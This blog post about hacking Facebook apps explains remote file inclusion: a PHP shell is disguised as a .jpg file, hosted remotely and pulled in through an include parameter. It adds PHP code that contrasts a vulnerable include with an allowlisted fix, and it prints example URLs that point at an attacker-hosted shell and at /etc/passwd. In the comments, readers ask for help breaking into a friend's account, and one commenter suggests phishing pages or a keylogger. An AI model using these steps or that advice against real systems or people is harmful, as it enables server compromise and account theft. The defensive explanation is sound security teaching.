Facebook Hacking: Remote File Inclusion Attack
Facebook, being the world's largest social networking website, has become a major target for hackers, attackers and other malicious users. Facebook has hired a team of the world's leading security experts to improve the website's security. Moreover, Facebook also pays $500 to anyone who can identify a vulnerability in Facebook.
The Facebook security team has done a great job of raising Facebook's security to a high level. The problem, however, is that Facebook applications are neither coded nor monitored by Facebook, and it is not feasible for Facebook to audit every single app for vulnerabilities. These apps are mostly written by ordinary programmers who are not well aware of how to write code securely, which leaves Facebook apps riddled with common vulnerabilities like XSS (cross-site scripting), clickjacking, remote file inclusion and so on.
Of all these web application vulnerabilities, remote file inclusion (RFI) is a very common attack. It occurs because the application does not validate the files it includes: a file name or URL taken from the request is passed straight to the include routine, so an attacker can make the application fetch and execute code hosted on a server the attacker controls. According to Imperva, 21% of the apps on Facebook are vulnerable to remote file inclusion.
Here is how the attack is carried out:
Step 1 - The attacker prepares a malicious "JPG" file, because uploading PHP files is usually blocked on web hosts where the attacker only has user-level privileges. The attacker therefore renames a PHP shell to something like shell.php.jpg and uploads it to a web server they control. The extension does not matter for RFI: the vulnerable application fetches the file over HTTP and hands its contents to the PHP interpreter, which executes any PHP code it finds inside.
Step 2 - Next, the attacker exploits the RFI vulnerability by pointing the vulnerable include parameter at the malicious JPG. The request looks something like:
<vulnerable script>.php?page=<URL of the malicious image>
Step 3 - The attacker then requests the vulnerable page with that parameter. The server fetches the image, executes the PHP shell embedded in it, and the attacker gains control of the server with the privileges of the web server process.
Mitigation:
Imperva suggests a four-step mitigation process, shown in the image below. However, it includes deploying a web application firewall (WAF); what if someone is not using a WAF, will they still be protected?
Exploiting RFI And Mitigation
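The attack steps and the mitigation question above both come down to one line of application code, so here is an added example (not code from the original post, from Imperva, or from any Facebook app) showing the vulnerable include pattern beside an allowlisted replacement that needs no WAF. The parameter name "page" follows the post; the script name vulnerable.php, the attacker host attacker.example and the page file names are hypothetical.

```php
<?php
// Added example, not code from the original post or from any Facebook app:
// the include() pattern behind the attack described above, next to an
// allowlisted replacement. The parameter name "page" follows the post; the
// script and page file names and the attacker host are hypothetical.

// --- Vulnerable ----------------------------------------------------------
// The query parameter reaches include() unchanged. If php.ini has
// allow_url_include=On (it also needs allow_url_fopen=On), a request such as
//   /vulnerable.php?page=http://attacker.example/shell.php.jpg
// makes PHP fetch that URL and execute every <?php ... ?> block in the
// response. The .jpg suffix is irrelevant: the interpreter parses the body
// it fetched, not the file name. Even with allow_url_include=Off this code
// stays vulnerable to local file inclusion (?page=../../../../etc/passwd).
function render_page_vulnerable(array $get): void
{
    include $get['page'];
}

// --- Hardened ------------------------------------------------------------
// User input selects an entry in a fixed map and is never used as a path or
// URL, so neither a remote URL nor "../" sequences can reach include().
const PAGE_MAP = [
    'home'    => 'home.php',
    'profile' => 'profile.php',
    'about'   => 'about.php',
];

function resolve_page($page): ?string
{
    // Reject non-strings (?page[]=x arrives as an array) and unknown keys.
    if (!is_string($page) || !array_key_exists($page, PAGE_MAP)) {
        return null;                       // refuse, do not guess
    }
    return __DIR__ . '/pages/' . PAGE_MAP[$page];
}

function render_page_hardened(array $get): void
{
    $path = resolve_page($get['page'] ?? null);
    if ($path === null) {
        http_response_code(404);
        echo 'Not found';
        return;
    }
    include $path;
}

// Defence in depth: confirm the interpreter cannot fetch remote includes at
// all. allow_url_include defaults to Off (and is deprecated as of PHP 7.4);
// the hardened handler does not rely on it, but the check is cheap.
function remote_include_disabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN) === false;
}

if (PHP_SAPI === 'cli') {
    // Command-line demonstration of the resolver, no HTTP request needed.
    var_dump(resolve_page('profile'));                               // string: .../pages/profile.php
    var_dump(resolve_page('http://attacker.example/shell.php.jpg')); // NULL
    var_dump(resolve_page('../../../../etc/passwd'));                // NULL
    var_dump(remote_include_disabled());
} else {
    render_page_hardened($_GET);
}
```

The point of the map is that the request never supplies a path at all, only a key, so there is nothing for a WAF to filter: a remote URL, a double extension like shell.php.jpg or a traversal sequence simply has no entry and gets a 404. Turning allow_url_include off in php.ini is worth doing as well, but on its own it only stops the remote case; the same unvalidated include() still lets an attacker pull in local files, which is why the allowlist is the actual fix.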
Really nice one
But an image explanation will help the n00bs
Regards
M.Gazzaly
http://www.gazzaly.info
sv11@ If you can give a video tutorial with details then it will be much more helpful.... As most of us are beginners, it's not receptive to us with these technical terms....
Hope for a reply
@Anonymous 2
I will make a tutorial soon.
@Gazzaly
Really didn't understand what you were trying to say?
Hi, could you please help me hack the account of my friend? Please, here is my email anniejoymarcelo@yahoo.com
Hi! Can't you please help me learn how to hack a fb account? This is important, not only a game. It is about a mistress of my friend's husband. Thank you, search me in fb, account maria annah
You can make a fake fb page and send it to the victim, or you can install a keylogger in the PC....